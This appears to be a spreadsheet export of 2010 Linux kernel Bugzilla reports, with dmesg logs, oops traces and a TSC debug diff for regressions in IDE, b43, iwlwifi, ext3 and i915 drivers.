DMA for hdd ide1: BM-DMA at 0xe408-0xe40f via_write_devctl skip write 160, 502 via_write_devctl skip write 176, 502 via_write_devctl skip write 160, 502 hda: Maxtor 6Y120P0, ATA DISK drive via_write_devctl skip write 176, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_write_devctl skip write 176, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_write_devctl skip write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_write_devctl skip write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 ide1: no devices on the port via_write_devctl skip write 160, 502 via_write_devctl skip write 0, 374 ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 ide1 at 0x170-0x177,0x376 on irq 15 ide_generic: please use "probe_mask=0x3f" module parameter for probing all legacy ISA IDE ports ide-gd driver 1.18 hda: max request size: 128KiB via_write_devctl skip write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 175 in place of tf-&gt;device 175 value io_ports-&gt;device_addr 502 via_write_devctl skip write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 160 in place of tf-&gt;device 160 value io_ports-&gt;device_addr 502 via_write_devctl skip write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 160 in place of tf-&gt;device 160 value io_ports-&gt;device_addr 502 via_write_devctl skip write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 224 in place of tf-&gt;device 224 value io_ports-&gt;device_addr 502 via_write_devctl skip write 224, 502 hda: Host Protected Area detected. current capacity is 66055248 sectors (33820 MB) native capacity is 240121728 sectors (122942 MB) hda: 66055248 sectors (33820 MB) w/7936KiB Cache, CHS=65531/16/63 via_write_devctl skip write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 160 in place of tf-&gt;device 160 value io_ports-&gt;device_addr 502 via_write_devctl skip write 160, 502 hda: cache flushes supported hda:via_write_devctl skip write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 224 in place of tf-&gt;device 224 value io_ports-&gt;device_addr 502 hda1 hda2 hda3 hda: p3 size 236037312 exceeds device capacity, enabling native capacity via_write_devctl skip write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 224 in place of tf-&gt;device 224 value io_ports-&gt;device_addr 502 via_write_devctl skip write 224, 502 via_write_devctl skip write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 238 in place of tf-&gt;device 238 value io_ports-&gt;device_addr 502 via_write_devctl skip write 238, 502 hda: detected capacity change from 33820286976 to 122942324736 via_write_devctl skip write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 160 in place of tf-&gt;device 160 value io_ports-&gt;device_addr 502 via_write_devctl skip write 160, 502 ide-cd driver 5.00 VFS: Cannot open root device "1602" or unknown-block(22,2) Please append a correct "root=" boot option; here are the available partitions: 0300 120060864 hda driver: ide-gd 0301 49391 hda1 0302 1992816 hda2 0303 118018656 hda3 Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(22,2) First-Bad-Commit : f931a5d5785d7b7c44871bd7ad2762e29dfddf29 Notify-Also : linux-ide@vger.kernel.org</t>
  </si>
  <si>
    <t>Kernel 2.6.32 &amp; Kernel 2.6.33 --&gt; b43 not working with Broadcom 14e4:4315</t>
  </si>
  <si>
    <t>2.6.32 &amp; 2.6.33</t>
  </si>
  <si>
    <t>2010-03-28 14:08 UTC</t>
  </si>
  <si>
    <t>Chen Xiao-Long</t>
  </si>
  <si>
    <t>2010-11-23 18:27 UTC</t>
  </si>
  <si>
    <t>B43 does NOT work with kernel 2.6.32 or kernel 2.6.33 whether it's running in DMA or PIO mode. If compat-wireless is used, a kernel panic occurs. 2.6.32 (all revisions) ----------------------- With DMA, without compat-wireless --&gt; kernel panic With PIO, without compat-wireless --&gt; loads, but won't connect to any network With DMA, with compat-wireless --&gt; kernel panic With PIO, with compat-wireless --&gt; kernel panic 2.6.33 (2.6.33 &amp; 2.6.33.1) --------------------------- With DMA, without compat-wireless --&gt; fatal DMA errors With PIO, without compat-wireless --&gt; won't connect to any network With DMA, with compat-wireless --&gt; kernel panic With PIO, with compat-wireless --&gt; kernel panic Certain people at Ubuntu Forums were able to get b43 working with the Broadcom 14e4:4315. piratesmack, at Ubuntu Forums, researched and found that this error (only?) occurs on Intel Atom processors and Intel Core [2] Duo processors.</t>
  </si>
  <si>
    <t>printk timestamps messed up after suspend/resume</t>
  </si>
  <si>
    <t>2010-03-29 07:08 UTC</t>
  </si>
  <si>
    <t>Yong Wang</t>
  </si>
  <si>
    <t>2012-06-14 17:16 UTC</t>
  </si>
  <si>
    <t>I am running mainline kernel 2.6.34-rc2 on an Intel Core i% box. Kernel was compiled with CONFIG_PRINTK_TIME enabled. I performed a suspend operation right after system startup and printk's timestamp prefix suddenly became a huge value after resume. Adding 'notsc' commandline option is a work around. Therefore, I suspect this issue is related to TSC. I also tried to disable the constant TSC feature with the following hack and it also works. diff --git a/arch/x86/kernel/cpu/intel.c b/arch/x86/kernel/cpu/intel.c index 7e1cca1..da3d672 100644 --- a/arch/x86/kernel/cpu/intel.c +++ b/arch/x86/kernel/cpu/intel.c @@ -43,9 +43,11 @@ static void __cpuinit early_init_intel(struct cpuinfo_x86 *c) } } +#if 0 if ((c-&gt;x86 == 0xf &amp;&amp; c-&gt;x86_model &gt;= 0x03) || (c-&gt;x86 == 0x6 &amp;&amp; c-&gt;x86_model &gt;= 0x0e)) set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC); +#endif #ifdef CONFIG_X86_64 set_cpu_cap(c, X86_FEATURE_SYSENTER32); @@ -67,12 +69,14 @@ static void __cpuinit early_init_intel(struct cpuinfo_x86 *c) * It is also reliable across cores and sockets. (but not across * cabinets - we turn it off in that case explicitly.) */ +#if 0 if (c-&gt;x86_power &amp; (1 &lt;&lt; 8)) { set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC); set_cpu_cap(c, X86_FEATURE_NONSTOP_TSC); if (!check_tsc_unstable()) sched_clock_stable = 1; } +#endif /* * There is a known erratum on Pentium III and Core Solo</t>
  </si>
  <si>
    <t>iwlwifi fails on high order allocations</t>
  </si>
  <si>
    <t>2010-03-30 03:41 UTC</t>
  </si>
  <si>
    <t>example: [155099.276880] NetworkManager: page allocation failure. order:4, mode:0x40d0 [155099.276888] Pid: 21182, comm: NetworkManager Not tainted 2.6.33-2-amd64 #1 [155099.276890] Call Trace: [155099.276902] [&lt;ffffffff810b54af&gt;] ? __alloc_pages_nodemask+0x56d/0x5e2 [155099.276908] [&lt;ffffffff810b4409&gt;] ? __get_free_pages+0x9/0x46 [155099.276928] [&lt;ffffffffa0378452&gt;] ? iwl_tx_queue_init+0xf1/0x2dd [iwlcore] [155099.276936] [&lt;ffffffffa03771d9&gt;] ? _iwl_grab_nic_access+0x3e/0xc3 [iwlcore] [155099.276945] [&lt;ffffffffa03787b4&gt;] ? iwl_txq_ctx_reset+0x176/0x1fa [iwlcore] [155099.276971] [&lt;ffffffffa0372437&gt;] ? iwl_hw_nic_init+0x123/0x143 [iwlcore] [155099.276979] [&lt;ffffffffa0474cb6&gt;] ? __iwl_up+0x179/0x323 [iwlagn] [155099.276985] [&lt;ffffffffa0475528&gt;] ? iwl_mac_start+0x6c8/0x842 [iwlagn] [155099.276991] [&lt;ffffffff810f7adc&gt;] ? pollwake+0x53/0x5b [155099.276996] [&lt;ffffffff81042cb5&gt;] ? default_wake_function+0x0/0x9 [155099.277002] [&lt;ffffffff81038803&gt;] ? __wake_up+0x30/0x44 [155099.277007] [&lt;ffffffff8125ca50&gt;] ? netlink_broadcast+0x266/0x29d [155099.277020] [&lt;ffffffffa0314aa6&gt;] ? ieee80211_open+0x27b/0x66e [mac80211] [155099.277031] [&lt;ffffffffa02514da&gt;] ? cfg80211_netdev_notifier_call+0x3c7/0x3dd [cfg80211] [155099.277038] [&lt;ffffffff812438ad&gt;] ? dev_open+0xa4/0xe6 [155099.277042] [&lt;ffffffff81242e88&gt;] ? dev_change_flags+0xaf/0x16d [155099.277047] [&lt;ffffffff8124b783&gt;] ? do_setlink+0x289/0x356 [155099.277053] [&lt;ffffffff8124bea5&gt;] ? rtnetlink_rcv_msg+0x0/0x1f5 [155099.277057] [&lt;ffffffff8124b961&gt;] ? rtnl_setlink+0x111/0x122 [155099.277061] [&lt;ffffffff8124bf09&gt;] ? rtnetlink_rcv_msg+0x64/0x1f5 [155099.277066] [&lt;ffffffff8125ceb5&gt;] ? netlink_rcv_skb+0x34/0x7c [155099.277070] [&lt;ffffffff8124be9f&gt;] ? rtnetlink_rcv+0x1f/0x25 [155099.277074] [&lt;ffffffff8125cca9&gt;] ? netlink_unicast+0xe2/0x148 [155099.277078] [&lt;ffffffff8125d3dd&gt;] ? netlink_sendmsg+0x23f/0x252 [155099.277083] [&lt;ffffffff81232de3&gt;] ? sock_sendmsg+0x83/0x9b [155099.277087] [&lt;ffffffff81232de3&gt;] ? sock_sendmsg+0x83/0x9b [155099.277097] [&lt;ffffffff8123bc2f&gt;] ? copy_from_user+0x13/0x25 [155099.277101] [&lt;ffffffff8123bfe5&gt;] ? verify_iovec+0x49/0x84 [155099.277105] [&lt;ffffffff812330b8&gt;] ? sys_sendmsg+0x225/0x2af [155099.277110] [&lt;ffffffff81232e5d&gt;] ? sockfd_lookup_light+0x1a/0x50 [155099.277114] [&lt;ffffffff8123487f&gt;] ? sys_sendto+0xe8/0x117 [155099.277118] [&lt;ffffffff81234307&gt;] ? sys_recvmsg+0x48/0x56 [155099.277124] [&lt;ffffffff81008ac2&gt;] ? system_call_fastpath+0x16/0x1b [155099.277127] Mem-Info: [155099.277129] Node 0 DMA per-cpu: [155099.277133] CPU 0: hi: 0, btch: 1 usd: 0 155099.277136] CPU 1: hi: 0, btch: 1 usd: 0 [155099.277138] Node 0 DMA32 per-cpu: [155099.277142] CPU 0: hi: 186, btch: 31 usd: 0 [155099.277145] CPU 1: hi: 186, btch: 31 usd: 49 [155099.277152] active_anon:79636 inactive_anon:88961 isolated_anon:30 [155099.277153] active_file:20475 inactive_file:26822 isolated_file:12 [155099.277155] unevictable:1 dirty:44 writeback:172 unstable:0 [155099.277156] free:4680 slab_reclaimable:7245 slab_unreclaimable:9425 [155099.277158] mapped:12535 shmem:12821 pagetables:5971 bounce:0 [155099.277161] Node 0 DMA free:3904kB min:60kB low:72kB high:88kB active_anon:808kB inactive_anon:2548kB active_file:1420kB inactive_file:2916kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15344kB mlocked:0kB dirty:0kB writeback:0kB mapped:520kB shmem:28kB slab_reclaimable:1812kB slab_unreclaimable:1012kB kernel_stack:32kB pagetables:28kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [155099.277176] lowmem_reserve[]: 0 969 969 969 [155099.277181] Node 0 DMA32 free:14816kB min:3948kB low:4932kB high:5920kB active_anon:317736kB inactive_anon:353296kB active_file:80480kB inactive_file:104372kB unevictable:4kB isolated(anon):120kB isolated(file):48kB present:992512kB mlocked:4kB dirty:176kB writeback:688kB mapped:49620kB shmem:51256kB slab_reclaimable:27168kB slab_unreclaimable:36688kB kernel_stack:2640kB pagetables:23856kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:42 all_unreclaimable? no [155099.277197] lowmem_reserve[]: 0 0 0 0 [155099.277201] Node 0 DMA: 270*4kB 201*8kB 40*16kB 0*32kB 1*64kB 0*128kB 0*256kB 1*512kB 0*1024kB 0*2048kB 0*4096kB = 3904kB [155099.277215] Node 0 DMA32: 1184*4kB 1164*8kB 48*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 14816kB [155099.277228] 86645 total pagecache pages [155099.277230] 26506 pages in swap cache [155099.277233] Swap cache stats: add 503800, delete 477294, find 151025/207691 [155099.277235] Free swap = 1963664kB [155099.277238] Total swap = 2285824kB [155099.282535] 255664 pages RAM [155099.282538] 5326 pages reserved [155099.282540] 88132 pages shared [155099.282542] 196334 pages non-shared [155099.282546] iwlagn 0000:03:00.0: kmalloc for auxiliary BD structures failed [155099.282600] iwlagn 0000:03:00.0: Tx 14 queue init failed [155099.283207] iwlagn 0000:03:00.0: Unable to init nic lspci -vv -s 03:00.0 03:00.0 Network controller: Intel Corporation PRO/Wireless 4965 AG or AGN Network Connection (rev 61) Subsystem: Intel Corporation Device 1111 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 29 Region 0: Memory at f7f00000 (64-bit, non-prefetchable) [size=8K] Capabilities: &lt;access denied&gt; Kernel driver in use: iwlagn can f36d04abe684f9e2b07c6ebe9f77ae20eb5c1e84 and friends please be pushed out to stable@kernel.org. easily reproducible on any kernel on this x61s since 2.6.26, just need a small couple of suspend cycles, kill firefox from time to time and maybe running some funky physics code.</t>
  </si>
  <si>
    <t>corrupt ext3 fs and partial freeze</t>
  </si>
  <si>
    <t>2010-03-30 08:25 UTC</t>
  </si>
  <si>
    <t>Alban Browaeys</t>
  </si>
  <si>
    <t>2010-04-20 03:37 UTC</t>
  </si>
  <si>
    <t>Created attachment 25762 [details] kernel log (full) Sorry it is against wireless-testing. I am not eager to test again or bisect : the filesystem gets corrupted after a little while (it get the boot ok ... but then later on I get this issue). And I already did 2 runs and it was close to big lose on the second before switching back to 2.6.33 wireless-testing (I had to use a live usb key and fsck with it ... a hundred of the groups were broken already). I am developping/testing ralink wireless thus the tree. It is really close to https://bugzilla.kernel.org/show_bug.cgi?id=15610 . As far as I can tell the Tainted comes from the previous lockdep warning. As it seems the dkms build of external modules did not happened. [ 575.960512] BUG: unable to handle kernel NULL pointer dereference at (null) [ 575.960536] IP: [&lt;c0128d3f&gt;] __wake_up_common+0x1f/0x70 [ 575.960560] *pde = 00000000 [ 575.960571] Oops: 0000 [#2] SMP [ 575.960585] last sysfs file: /sys/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A08:00/PNP0C0A:00/power_supply/BAT0/charge_full [ 575.960599] Modules linked in: nfsd lockd nfs_acl auth_rpcgss sunrpc exportfs ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack ipt_REJECT xt_tcpudp iptable_filter ip_tables x_tables ppdev parport af_packet sco bridge stp bnep l2cap crc16 bluetooth ipx p8022 psnap llc p8023 ipv6 ipmi_devintf ipmi_si(+) ibmpex ipmi_msghandler acpi_cpufreq cpufreq_conservative cpufreq_powersave cpufreq_userspace cpufreq_ondemand cpufreq_stats freq_table binfmt_misc fuse tun uinput dm_crypt snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer eeepc_laptop snd_seq_device sparse_keymap uvcvideo snd rtc_cmos tpm_tis rfkill psmouse rtc_core videodev soundcore tpm v4l1_compat joydev led_class rng_core snd_page_alloc rtc_lib tpm_bios serio_raw ac evdev battery processor pci_hotplug ext3 jbd mbcache dm_mod md_mod hid_logitech usbhid hid usb_storage usb_libusual s _mod ata_generic pata_acpi ata_piix libata uhci_hcd ehci_hcd atl1e scsi_mod usbcore thermal fan i915 drm_kms_helper drm i2c_algo_bit button i2c_core intel_agp agpgart video thermal_sys output fbcon tileblit font bitblit softcursor [last unloaded: pciehp] [ 575.961030] [ 575.961042] Pid: 7382, comm: dwww-build Tainted: G D W 2.6.34-rc2-wleeepc #25 1000H/1000H [ 575.961054] EIP: 0060:[&lt;c0128d3f&gt;] EFLAGS: 00010082 CPU: 0 [ 575.961066] EIP is at __wake_up_common+0x1f/0x70 [ 575.961075] EAX: c3ea0ec8 EBX: fffffff4 ECX: 00000001 EDX: 00000000 [ 575.961084] ESI: 00000003 EDI: 00000292 EBP: e25d9d50 ESP: e25d9d34 [ 575.961094] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 575.961106] Process dwww-build (pid: 7382, ti=e25d8000 task=e891e700 task.ti=e25d8000) [ 575.961115] Stack: [ 575.961122] 00000000 00000001 00000003 c012cb90 c3ea0ea4 00000003 00000292 e25d9d70 [ 575.961152] &lt;0&gt; c012cbac 00000000 e25d9d7c 00000001 c05ac378 c0591780 00000084 e25d9d84 [ 575.961186] &lt;0&gt; c0157a3e e25d9d7c c05ac378 00000003 e25d9d94 c0157a9c c05ac10c c05ac10c [ 575.961222] Call Trace: [ 575.961238] [&lt;c012cb90&gt;] ? __wake_up+0x20/0x60 [ 575.961252] [&lt;c012cbac&gt;] ? __wake_up+0x3c/0x60 [ 575.961269] [&lt;c05ac378&gt;] ? code_bytes_setup+0xb/0x26 [ 575.961284] [&lt;c0157a3e&gt;] ? __wake_up_bit+0x2e/0x30 [ 575.961299] [&lt;c05ac378&gt;] ? code_bytes_setup+0xb/0x26 [ 575.961313] [&lt;c0157a9c&gt;] ? wake_up_bit+0x5c/0x60 [ 575.961327] [&lt;c05ac10c&gt;] ? trap_init+0x27d/0x44c [ 575.961341] [&lt;c05ac10c&gt;] ? trap_init+0x27d/0x44c [ 575.961356] [&lt;c020c265&gt;] ? unlock_new_inode+0x95/0xc0 [ 575.961370] [&lt;c05ac10c&gt;] ? trap_init+0x27d/0x44c [ 575.961383] [&lt;c05ac10c&gt;] ? trap_init+0x27d/0x44c [ 575.961432] [&lt;fa6fc9f3&gt;] ? ext3_iget+0x273/0x440 [ext3] [ 575.961447] [&lt;c020a65c&gt;] ? d_alloc+0xfc/0x180 [ 575.961494] [&lt;fa702e87&gt;] ? ext3_lookup+0x87/0x100 [ext3] [ 575.961510] [&lt;c03e9ea2&gt;] ? _raw_spin_unlock+0x22/0x30 [ 575.961524] [&lt;c020a682&gt;] ? d_alloc+0x122/0x180 [ 575.961553] [&lt;c0200e13&gt;] ? do_lookup+0x163/0x1c0 [ 575.961567] [&lt;c020305d&gt;] ? link_path_walk+0x42d/0x9b0 [ 575.961582] [&lt;c0203711&gt;] ? path_walk+0x51/0xc0 [ 575.961596] [&lt;c02037d9&gt;] ? do_path_lookup+0x59/0x90 [ 575.961611] [&lt;c02042e1&gt;] ? user_path_at+0x41/0x80 [ 575.961625] [&lt;c02a7c5b&gt;] ? copy_to_user+0x3b/0x120 [ 575.961642] [&lt;c01fc1ca&gt;] ? vfs_fstatat+0x3a/0x70 [ 575.961656] [&lt;c01fc260&gt;] ? vfs_lstat+0x20/0x30 [ 575.961671] [&lt;c01fc289&gt;] ? sys_lstat64+0x19/0x30 [ 575.961686] [&lt;c0192ad2&gt;] ? audit_syscall_entry+0x1e2/0x210 [ 575.961700] [&lt;c0102d8d&gt;] ? sysenter_exit+0xf/0x1a [ 575.961714] [&lt;c0102d58&gt;] ? sysenter_do_call+0x12/0x38 [ 575.961724] Code: 1f 44 00 00 e8 53 ff ff ff 5d c3 90 55 89 e5 57 56 53 83 ec 10 0f 1f 44 00 00 89 55 ec 89 4d e8 8b 50 24 83 c0 24 8d 5a f4 39 d0 &lt;8b&gt; 73 0c 89 45 f0 74 3b 83 ee 0c eb 09 8d 74 26 00 89 f3 8d 70 [ 575.961911] EIP: [&lt;c0128d3f&gt;] __wake_up_common+0x1f/0x70 SS:ESP 0068:e25d9d34 [ 575.961930] CR2: 0000000000000000 [ 575.961942] ---[ end trace 28287be16bbcea07 ]--- [ 575.967255] BUG: unable to handle kernel NULL pointer dereference at (null) [ 575.967278] IP: [&lt;c0128d3f&gt;] __wake_up_common+0x1f/0x70 [ 575.967302] *pde = 00000000 [ 575.967314] Oops: 0000 [#3] SMP [ 575.967327] last sysfs file: /sys/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A08:00/PNP0C0A:00/power_supply/BAT0/charge_full [ 575.967339] Modules linked in: nfsd lockd nfs_acl auth_rpcgss sunrpc exportfs ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack ipt_REJECT xt_tcpudp iptable_filter ip_tables x_tables ppdev parport af_packet sco bridge stp bnep l2cap crc16 bluetooth ipx p8022 psnap llc p8023 ipv6 ipmi_devintf ipmi_si(+) ibmpex ipmi_msghandler acpi_cpufreq cpufreq_conservative cpufreq_powersave cpufreq_userspace cpufreq_ondemand cpufreq_stats freq_table binfmt_misc fuse tun uinput dm_crypt snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer eeepc_laptop snd_seq_device sparse_keymap uvcvideo snd rtc_cmos tpm_tis rfkill psmouse rtc_core videodev soundcore tpm v4l1_compat joydev led_class rng_core snd_page_alloc rtc_lib tpm_bios serio_raw ac evdev battery processor pci_hotplug ext3 jbd mbcache dm_mod md_mod hid_logitech usbhid hid usb_storage usb_libusual s _mod ata_generic pata_acpi ata_piix libata uhci_hcd ehci_hcd atl1e scsi_mod usbcore thermal fan i915 drm_kms_helper drm i2c_algo_bit button i2c_core intel_agp agpgart video thermal_sys output fbcon tileblit font bitblit softcursor [last unloaded: pciehp] [ 575.967792] [ 575.967808] Pid: 6884, comm: run-parts Tainted: G D W 2.6.34-rc2-wleeepc #25 1000H/1000H [ 575.967820] EIP: 0060:[&lt;c0128d3f&gt;] EFLAGS: 00010086 CPU: 0 [ 575.967834] EIP is at __wake_up_common+0x1f/0x70 [ 575.967845] EAX: c3ea0e9c EBX: fffffff4 ECX: 00000001 EDX: 00000000 [ 575.967856] ESI: 00000003 EDI: 00000292 EBP: e8981d50 ESP: e8981d34 [ 575.967866] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 575.967876] Process run-parts (pid: 6884, ti=e8980000 task=ecbc19c0 task.ti=e8980000) [ 575.967884] Stack: [ 575.967891] 00000000 00000001 00000003 c012cb90 c3ea0e78 00000003 00000292 e8981d70 [ 575.967923] &lt;0&gt; c012cbac 00000000 e8981d7c 00000001 c05ac718 c0591780 00000084 e8981d84 [ 575.967955] &lt;0&gt; c0157a3e e8981d7c c05ac718 00000003 e8981d94 c0157a9c c05ac4ac c05ac4ac [ 575.967994] Call Trace: [ 575.968011] [&lt;c012cb90&gt;] ? __wake_up+0x20/0x60 [ 575.968023] [&lt;c012cbac&gt;] ? __wake_up+0x3c/0x60 [ 575.968023] [&lt;c05ac718&gt;] ? setup_arch+0x2be/0xaa1 [ 575.968023] [&lt;c0157a3e&gt;] ? __wake_up_bit+0x2e/0x30 [ 575.968023] [&lt;c05ac718&gt;] ? setup_arch+0x2be/0xaa1 [ 575.968023] [&lt;c0157a9c&gt;] ? wake_up_bit+0x5c/0x60 [ 575.968023] [&lt;c05ac4ac&gt;] ? setup_arch+0x52/0xaa1 [ 575.968023] [&lt;c05ac4ac&gt;] ? setup_arch+0x52/0xaa1 [ 575.968023] [&lt;c020c265&gt;] ? unlock_new_inode+0x95/0xc0 [ 575.968023] [&lt;c05ac4ac&gt;] ? setup_arch+0x52/0xaa1 [ 575.968023] [&lt;c05ac4ac&gt;] ? setup_arch+0x52/0xaa1 [ 575.968132] [&lt;fa6fc9f3&gt;] ? ext3_iget+0x273/0x440 [ext3] [ 575.968132] [&lt;c020a65c&gt;] ? d_alloc+0xfc/0x180 [ 575.968132] [&lt;fa702e87&gt;] ? ext3_lookup+0x87/0x100 [ext3] [ 575.968132] [&lt;c03e9ea2&gt;] ? _raw_spin_unlock+0x22/0x30 [ 575.968132] [&lt;c020a682&gt;] ? d_alloc+0x122/0x180 [ 575.968132] [&lt;c0200e13&gt;] ? do_lookup+0x163/0x1c0 [ 575.968132] [&lt;c020305d&gt;] ? link_path_walk+0x42d/0x9b0 [ 575.968132] [&lt;c0203711&gt;] ? path_walk+0x51/0xc0 [ 575.968132] [&lt;c02037d9&gt;] ? do_path_lookup+0x59/0x90 [ 575.968132] [&lt;c02042e1&gt;] ? user_path_at+0x41/0x80 [ 575.968132] [&lt;c01dedfe&gt;] ? handle_mm_fault+0x37e/0x860 [ 575.968132] [&lt;c01dedfe&gt;] ? handle_mm_fault+0x37e/0x860 [ 575.968132] [&lt;c03e9481&gt;] ? _raw_spin_lock+0x61/0x70 [ 575.968132] [&lt;c01fc1ca&gt;] ? vfs_fstatat+0x3a/0x70 [ 575.968132] [&lt;c01fc320&gt;] ? vfs_stat+0x20/0x30 [ 575.968132] [&lt;c01fc349&gt;] ? sys_stat64+0x19/0x30 [ 575.968132] [&lt;c015cabb&gt;] ? up_read+0x1b/0x30 [ 575.968132] [&lt;c0192ad2&gt;] ? audit_syscall_entry+0x1e2/0x210 [ 575.968132] [&lt;c03ea0d6&gt;] ? restore_all_notrace+0x0/0x18 [ 575.968132] [&lt;c03ed060&gt;] ? do_page_fault+0x0/0x3c0 [ 575.968132] [&lt;c0102d58&gt;] ? sysenter_do_call+0x12/0x38 [ 575.968132] Code: 1f 44 00 00 e8 53 ff ff ff 5d c3 90 55 89 e5 57 56 53 83 ec 10 0f 1f 44 00 00 89 55 ec 89 4d e8 8b 50 24 83 c0 24 8d 5a f4 39 d0 &lt;8b&gt; 73 0c 89 45 f0 74 3b 83 ee 0c eb 09 8d 74 26 00 89 f3 8d 70 [ 575.968132] EIP: [&lt;c0128d3f&gt;] __wake_up_common+0x1f/0x70 SS:ESP 0068:e8981d34 [ 575.968132] CR2: 0000000000000000 [ 575.968579] ---[ end trace 28287be16bbcea08 ]-- I will get a second station up to test (with no real data). So I will be able to bisect on it in a few days.</t>
  </si>
  <si>
    <t>[Regresion] [2.6.34-rc1] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung</t>
  </si>
  <si>
    <t>2010-03-31 19:29 UTC</t>
  </si>
  <si>
    <t>2012-05-09 20:50 UTC</t>
  </si>
  <si>
    <t>Subject : [Regresion] [2.6.34-rc1] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung Submitter : Maciej Rutecki &lt;maciej.rutecki@gmail.com&gt; Date : 2010-03-25 20:04 Message-ID : 201003252104.24965.maciej.rutecki@gmail.com References : http://marc.info/?l=linux-kernel&amp;m=126954749618319&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>PROBLEM: crash on halt with 2.6.34-0.16.rc2.git0.fc14.x86_64</t>
  </si>
  <si>
    <t>2.6.34-rc</t>
  </si>
  <si>
    <t>2010-03-31 19:55 UTC</t>
  </si>
  <si>
    <t>2010-05-04 21:09 UTC</t>
  </si>
  <si>
    <t>Subject : PROBLEM: crash on halt with 2.6.34-0.16.rc2.git0.fc14.x86_64 Submitter : Jon Masters &lt;jonathan@jonmasters.org&gt; Date : 2010-03-26 15:29 Message-ID : 1269617372.3779.234.camel@localhost References : http://marc.info/?l=linux-kernel&amp;m=126961739803949&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>hpet warning and strack trace on Toshiba Satellite A505</t>
  </si>
  <si>
    <t>2010-03-31 23:37 UTC</t>
  </si>
  <si>
    <t>Steve Rigler</t>
  </si>
  <si>
    <t>15745 15756</t>
  </si>
  <si>
    <t>Created attachment 25788 [details] output from dmesg Toshiba Satellite A505 gives warnings about hpet and a stack trace while booting. Providing dmesg output from a 2.6.33.1 kernel using patch from bug 14679 (although this message is reproducible without the patch).</t>
  </si>
  <si>
    <t>2.6.34-rc3</t>
  </si>
  <si>
    <t>2010-04-01 01:09 UTC</t>
  </si>
  <si>
    <t>2011-03-06 00:32 UTC</t>
  </si>
  <si>
    <t>Created attachment 25789 [details] dmesg output showing kernel backtrace at moment of hang System is Fedora 12 x86_64 with latest updates. Recently compiled and installed kernel 2.6.34-rc3. A few hours after running the kernel, I try to start Azureus (the Bittorrent client), and the graphics screen freezes completely. I cannot move the mouse, and the keyboard is unresponsive, and not even the numlock LED changes when pressing the numlock key. At the same time I hear a single beep from the PC speaker. I have found that the machine is still responsive via network. When I logged remotely, I was able to collect the attached kernel backtraces. This problem is intermittent. Twice I have had the problem, and other times I have started Azureus without problems. Steps to reproduce: 1) Run 2.6.34-rc3 kernel on x86_64 and intel graphics chipset 2) Enable compiz on GNOME 3) Try to start Azureus (might take a few retries) Expected results: no crash, application starts normally Actual results: graphics hang</t>
  </si>
  <si>
    <t>general protection fault from iwlagn</t>
  </si>
  <si>
    <t>2.6.34-rc3-tip+</t>
  </si>
  <si>
    <t>2010-04-01 14:09 UTC</t>
  </si>
  <si>
    <t>2010-04-24 06:13 UTC</t>
  </si>
  <si>
